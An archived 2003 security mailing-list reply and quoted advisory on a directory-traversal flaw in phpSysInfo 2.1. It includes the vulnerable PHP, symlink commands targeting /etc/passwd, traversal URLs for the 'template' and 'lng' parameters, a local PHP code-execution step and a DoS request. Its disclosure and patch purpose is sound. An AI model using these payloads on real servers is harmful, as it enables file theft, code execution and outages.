Re: Unauthorized reading files on phpSysInfo

From: Wolter Kamphuis (security_at_wkamphuis.student.utwente.nl)
Date: 04/25/03

  • Next message: David F. Madrid: "Cross site scripting in Onecenter forum 4.0" 
    Date: Fri, 25 Apr 2003 20:31:43 +0200
To: ripe@7a69ezine.org

    Hi,

    In bug report #670222 I described the same problem and how to use it to
    DoS the host. Calling "index.php?lng=../../index" creates a run-a-way
    recursive loop, creating a huge load and finally crashing the
    apache process. This can easily be used to DoS a webserver.
    http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

    On 19 january my fix for this problem has been incorporated in the cvs
    repository. This also fixes the problems described in Albert Puigsech
    Galicia's report.
    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

    phpSysInfo 2.1 is vulnerable, the cvs versions after 19 january are not.

    mzzl
       Wolter Kamphuis

    Albert Puigsech Galicia wrote:
    > /-----------------------------------------------------------------------------\
    > | 7 A 6 9 - A d v C: 007
    > |-----------------------------------------------------------------------------|
    > |
    > | [ Unauthorized reading files on phpSysInfo ]
    > |
    > \-----------------------------------------------------------------------------/
    > | 01/04/2003 |
    >
    >
    > Data.
    > -----
    >
    > + Type: To gain visiblity.
    >
    > + Software: phpSysInfo.
    >
    > + Verions: until 2.1 (current version).
    >
    > + Exploit: Yes (but only local).
    >
    > + Autor: Albert Puigsech Galicia
    >
    > + Contact: ripe@7a69ezine.org
    >
    >
    >
    > Information.
    > ------------
    >
    > PhpSysInfo is a litle PHP script destined to show system information.
    > It shows data like CPU or memory usage, Disk usage, PCI, ethernet, and IDE
    > information, etc. Visit project website on http://phpsysinfo.sourceforge.net
    > for more info.
    >
    >
    > Description.
    > ------------
    >
    > PhpSysInfo uses a template system using 'template' variable, and a
    > languaje system using 'lng' variable. These variables are used to complete
    > a file path without check if it contains the '..' especial directory, allowing
    > to read any file on system as webserver user.
    >
    >
    > Exploiting.
    > -----------
    >
    > The exploit of this vulnerability require write access on a local
    > directory where webserver can read files.
    >
    > On template case, phpSysInfo cheks only if template exists. To do
    > it only check if 'templates/$template' exists.
    >
    >
    > ---/ index.php /---
    >
    > if (!((isset($template) && file_exists("templates/$template")) || $template ==
    > 'xml')) {
    > // default template we should use if we don't get a argument.
    > $template = 'classic';
    > }
    >
    > ---/ index.php /---
    >
    >
    > Exactly the same on languaje selection system.
    >
    >
    > ---/ index.php /---
    >
    > if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    > $lng = 'en';
    > // see if the browser knows the right languange.
    > if(isset($HTTP_ACCEPT_LANGUAGE)) {
    > $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
    > if(count($plng) > 0) {
    > while(list($k,$v) = each($plng)) {
    > $k = split(';', $v, 1);
    > $k = split('-', $k[0]);
    > if(file_exists('./includes/lang/' . $k[0] . '.php')) {
    > $lng = $k[0];
    > break;
    > }
    > }
    > }
    > }
    > }
    >
    > ---/ index.php /---
    >
    > 'template, variable will be used to use the file
    > './templates/$template/form.tpl' and './templates/$template/box.tpl'
    > for template stuff, so is necesary ti create the symlinks to read
    > any file allowed to webserver.
    >
    >
    > local ~$ ln -s /etc/passwd /tmp/form.tpl
    > local ~$ ln -s /etc/passwd /tmp/box.tpl
    >
    > http://vulnerable/index.php?template=../../../../tmp
    >
    >
    > 'lng' variable is used on this peace of code:
    >
    > ---/ index.php /---
    >
    > require('./includes/lang/' . $lng . '.php'); // get our language include
    >
    > ---/ index.php /---
    >
    >
    > It allow us, as the same way as 'template' to read a file on
    > the system.
    >
    >
    > local ~$ ln -s /etc/passwd /tmp/p.php
    >
    > http://vulnerable/index.php?lng=../../../../tmp/p
    >
    >
    > But it also allow to execute arbitrary PHP code, creating the php
    > file firts.
    >
    >
    > local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
    >
    > http://vulnerable/index.php?lng=../../../../tmp/p
    >
    >
    > The use of '.' php function to concat strings remote exploit for
    > this vulnerable php script, because we cant use %00 to end the string.
    >
    >
    > Patch.
    > ------
    >
    > There is not an oficial patch, but is easy to code it adding some
    > regex on the code to filter '..' content on 'template' and 'lng' variables.
    >
    >
    >
    > --
    >
    >>====================================
    >>Albert Puigsech Galicia (7a69)
    >>
    >>http://ripe.7a69ezine.org
    >>====================================
    >
    >

  • Next message: David F. Madrid: "Cross site scripting in Onecenter forum 4.0"